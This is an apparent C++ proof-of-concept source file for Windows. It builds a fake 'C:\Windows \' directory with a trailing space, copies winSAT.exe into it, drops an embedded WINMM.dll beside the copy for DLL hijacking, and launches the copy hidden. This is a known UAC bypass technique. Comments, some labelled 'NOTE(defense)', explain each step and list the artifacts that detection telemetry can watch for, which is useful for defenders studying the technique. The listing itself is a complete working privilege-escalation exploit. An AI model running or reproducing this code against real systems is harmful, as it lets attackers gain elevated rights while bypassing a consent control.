
#include "stdafx.h"
#include <Windows.h>
#include "resource.h"
/*
 * Writes the embedded resource IDR_DATA1 (resource type given by rsrcName)
 * of the current module to filePath, overwriting any existing file
 * (CREATE_ALWAYS).
 *
 * rsrcName: resource type string handed to FindResource; the caller in
 *           main() passes L"DATA".
 * filePath: destination path; the caller passes a "\\?\"-prefixed path.
 *
 * None of the API results (FindResource, SizeofResource, LoadResource,
 * CreateFile, WriteFile) are checked, and the function has no return value,
 * so the caller cannot tell whether the file was actually written.
 *
 * NOTE(defense): the file written here is the on-disk artifact of the
 * technique — a DLL created at a path that does not match the binary's
 * real install location, by a non-Microsoft process, is the observable
 * event for file-creation telemetry.
 */
void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) {
// Resource is looked up in the executable itself, not in a loaded DLL.
HMODULE hMod = GetModuleHandle(NULL);
HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName);
DWORD dllSize = SizeofResource(hMod, res);
// LoadResource returns a pointer into the mapped image; it is not freed
// (and does not need to be for a module-owned resource).
void* dllBuff = LoadResource(hMod, res);
// Share mode 0: the file is opened exclusively while it is being written.
HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
DWORD sizeOut;
// sizeOut receives the byte count written but is never compared to dllSize.
WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
CloseHandle(hDll);
}
/*
 * Program entry point; this listing is the whole PoC.
 *
 * Sequence, as written:
 *   1. Creates "C:\Windows \" (note the trailing space in the name) and a
 *      "System32" subdirectory beneath it, both through the "\\?\" path
 *      prefix.
 *   2. Copies the genuine winSAT.exe out of the real System32 into that
 *      directory (bFailIfExists = false, so an existing copy is overwritten).
 *   3. Drops the embedded "DATA" resource there as WINMM.dll, next to the copy.
 *   4. Starts the copied winSAT.exe with ShellExecuteEx, argument "formal",
 *      hidden window.
 *
 * Nothing is cleaned up afterwards and no return value from any call is
 * checked; main always returns 0.
 *
 * NOTE(defense): the observable artifacts are a directory whose name is
 * "Windows" followed by a space at the drive root, a winSAT.exe process
 * launched from a path other than the real System32, and a WINMM.dll written
 * beside it. Process-creation and directory-creation telemetry keyed on those
 * paths covers every step of this listing.
 */
int main()
{
// Zero-initialised: fMask stays 0 and lpVerb stays NULL, so ShellExecuteEx
// uses its default verb and no process handle is requested back.
_SHELLEXECUTEINFOW se = {};
//Create Mock SystemRoot Directory
CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0);
CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false);
//Drop our dll for hijack
DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll");
//Execute our winSAT.exe copy from fake trusted directory
se.cbSize = sizeof(_SHELLEXECUTEINFOW);
// lpFile is given without the "\\?\" prefix that the directories were
// created with; the trailing space in "Windows " is still part of the literal.
se.lpFile = L"C:\\Windows \\System32\\winSAT.exe";
se.lpParameters = L"formal";
se.nShow = SW_HIDE;
se.hwnd = NULL;
se.lpDirectory = NULL;
// Return value (BOOL) is ignored; failure to launch is not reported.
ShellExecuteEx(&se);
return 0;
}